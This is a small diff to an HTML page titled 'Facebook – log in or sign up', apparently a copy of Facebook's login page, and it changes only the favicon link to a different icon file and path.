--- a/index.html
+++ b/index.html
@@ -4,7 +4,7 @@
 <head>
     <meta charset="UTF-8">
     <title id="pageTitle">Facebook – log in or sign up</title>
-    <link rel="shortcut icon" href="../icons8-facebook-color-120.png" type="image/x-icon">
+    <link rel="shortcut icon" href="./icons8-facebook-color-96.png" type="image/x-icon">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
 </head>
 
